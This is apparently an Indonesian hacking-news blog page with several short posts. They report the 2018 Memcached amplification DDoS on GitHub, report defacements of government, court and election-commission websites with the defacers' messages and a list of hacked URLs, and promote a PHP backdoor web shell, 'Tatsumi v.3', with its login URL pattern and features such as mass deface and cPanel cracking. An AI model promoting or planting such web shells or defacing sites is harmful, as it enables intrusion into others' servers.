Perusahaan dimiliki oleh VPN Networks LLC di bawah yurisdiksi AS yang berbasis di Nevis. Perusahaan menggunakan skrip yang sangat disesuaikan untuk memantau jaringan dan data Google Analytics yang dianonimkan untuk mengoptimalkan situs web mereka. Mereka juga menggunakan layanan SendGrid Email untuk Transactional Email.

Sumber: TorrentFreak

Situs Github mendapatkan serangan DDOS sebesar 1.35 Tbs !!

Situs Github mendapatkan serangan terbesar 1.35 Tbs !! - Pada hari Rabu, 28 Februari 2018, situs hosting kode GitHub terkena serangan penolakan layanan terdistribusi terbesar (DDoS) yang mencapai puncaknya pada rekor 1,35 Tbps.



Menariknya, penyerang tidak menggunakan jaringan botnet, malah menggunakan server Memcached yang tidak terkonfigurasi untuk memperkuat serangan DDoS.
Awal pekan ini kami menerbitkan sebuah laporan yang merinci bagaimana penyerang dapat menyalahgunakan Memcached, sistem open source yang populer dan mudah didistribusikan, untuk meluncurkan lebih dari 51.000 kali serangan DDoS yang kuat daripada kekuatan aslinya.

Dijuluki Memcrashed, serangan DDoS amplifikasi bekerja dengan mengirimkan permintaan palsu ke server Memcrashed yang ditargetkan pada port 11211 menggunakan alamat IP palsu yang sesuai dengan IP korban.



Beberapa byte permintaan yang dikirim ke server yang rentan memicu respons puluhan ribu kali lebih besar terhadap alamat IP yang ditargetkan.

"This attack was the largest attack seen to date by Akamai, more than twice the size of the September 2016 attacks that announced the Mirai botnet and possibly the largest DDoS attack publicly disclosed," said Akamai, a cloud computing company that helped Github to survive the attack.
In a post on its engineering blog, Github said, "The attack originated from over a thousand different autonomous systems (ASNs) across tens of thousands of unique endpoints. It was an amplification attack using the memcached-based approach described above that peaked at 1.35Tbps via 126.9 million packets per second."

Harapkan Serangan DDoS yang Melanggar Rekaman
Meskipun serangan amplifikasi tidak baru, vektor serangan ini menghasilkan ribuan server Memcached yang salah dikonfigurasi, yang banyak di antaranya masih terpapar di Internet dan dapat dimanfaatkan untuk melancarkan serangan yang berpotensi lebih besar lagi melawan target lainnya. Untuk mencegah server Memcached tidak disalahgunakan sebagai reflektor, administrator harus mempertimbangkan firewall, pemblokiran atau pembatasan tingkat UDP pada port sumber 11211 atau benar-benar menonaktifkan dukungan UDP jika tidak digunakan.

Website Jabar Bawaslu dirusak Hacker !!

Website Jabar Bawaslu dirusak Hacker !! - Baru saja mendapat informasi bahwa Situs Badan Pengawas Pemilihan Umum Jawa Barat diretas hacker dengan kodenama AaR99 dan V1yn. Hacker tersebut ingin memberikan curhatan dengan meninggalkan jejak gambar garuda.


Berikut pesan yang ditinggalkan pada halaman http://jabar.bawaslu.go.id/ 


 Ketika garuda kembali terluka karena provokasi makhluk durjana.. Ketika semboyan 'Bhinneka Tunggal Ika' kembali terabaikan karena aksi oknum yang mengatasnamakan agama.. Ketika ayat suci jadi bahan perdebatan oleh orang-orang yang merasa memiliki surga.. Ketika perjuangan pahlawan kemerdekaan sudah dilupakan begitu saja oleh mereka yang merasa paling berjasa... Tolong hentikan semua perpecahan ini Negaraku, bukan negara satu agama atau milik kelompok perusak adat budaya, juga bukan milik satu golongan.. Indonesia adalah negara Demokrasi ! Bangsa yang besar adalah bangsa yang menghormati jasa pahlawannya - Ir Soekarno . Politik ya politik jangan disandingkan dengan Agama - Megawati Soekarno Putri . Makanya tipe kamu pindah negara saja. Karena negeri kesepakatannya adalah demokrasi - Ridwan Kamil . Telah hilang moral di negara ini, Telah gagal pahlawanku untuk membentuk negeri ini Siapa yang pantas untuk disaan ? Siapakah kini plipur lara, nan setia dan perwira Siapakah kini pahlawan hati, pembela bangsa sejati


dan ia pun mencantumkan Kodenama teman temanya tersebut.

Sampai berita ini dirilis, belum ada perbaikan dari situs-situs yang diretas. (./Fruu)

Shell BACKDOOR Tatsumi v.3

Kali ini HSC ingin memberitahukan hasil Shell backdoor v.3 dari team Tatsumi, shell ini sangat ringan dan mudah digunakan


Tampilan Shell 

Cara Login
http://webtaget.com/namashell.php?nako=login

Fiture
  • Mass Deface
  • Adminer
  • Jumping
  • Symlink
  • Cpanel Crack
  • WHM GRAB
  • Config V2
  • Config V1
  • Config Bypass
  • Auto Edit User
  • Network
  • Bypass Tools
  • Csrf Exploiter
  • Mailer
  • Create RDP
  • Zip Menu
===> Pastebin  [Open Source]

Team Tatsumi memperbolehkan Recorder tapi ingat Copyright

Hacker Retas Situs Pengadilan di Bali, Berpesan Menolak Reklamasi !!

Hacker Retas Situs Pengadilan di Bali, Berpesan Menolak Reklamasi – Akhir ini peretas dengan kodenama Berandal dan k4luga melakukan peretasan di halaman depan situs PN Negara serta PN Amlapura dan meninggalkan pesan penolakan reklamasi di Bali. PN Negara dan PN Amlapura sendiri merupakan pengadilan negeri yang berlokasi di Bali.


Selain PN Negara dan Amlapura, beberapa situs lain juga menjadi korban. Berikut daftar situs yang diretas oleh pelaku

  • https://pn-negara.go.id/
  • http://sipp.pn-negara.go.id/
  • http://jdih.pn-negara.go.id/
  • https://perpustakaan.pn-negara.go.id/index.html
  • https://www.kpu-jembranakab.go.id/
  • http://dptool.kpu-jembranakab.go.id/
  • http://bankdata.kpu-jembranakab.go.id/
  • https://datapemilih.kpu-jembranakab.go.id/
  • http://pn-singaraja.go.id/
  • https://www.kpu-klungkungkab.go.id/
  • https://kpu-banglikab.go.id/
  • https://pn-amlapura.go.id/
Berikut pesan yang ditinggalkan pada halaman pn-negara.go.id.

BALI TOLAK REKLAMASI!
Selama 5 tahun gerakan, KITA menjadi orang-orang yang tidak penting dihadapan kekuasaan. Selama 5 tahun gerakan, KITA menjadi orang-orang termajinalkan. Dan hari ini, keniscayaan politik yang menyebabkan KITA … orang-orang yang berada dalam barisan gerakan ini menjadi penting dihadapan pilkada atau pilgub. Maka, mari KITA jaga barisan ini. Apapun warna kalian. Berbeda-bedapun warna KITA diluar barisan ini, maka ketika masuk kedalam barisan ini, KITA tetap kepalkan tangan kiri, KITA tetap teriakkan TOLAK REKLAMASI TELUK BENOA.
-Wayan Gendo Suardana-
Selain itu mereka juga melampirkan link ke beberapa artikel yang mengulas aksi penolakan terhadap reklamasi di Bali.

Sampai berita ini dirilis, belum ada perbaikan dari situs-situs yang diretas. (./Fruu)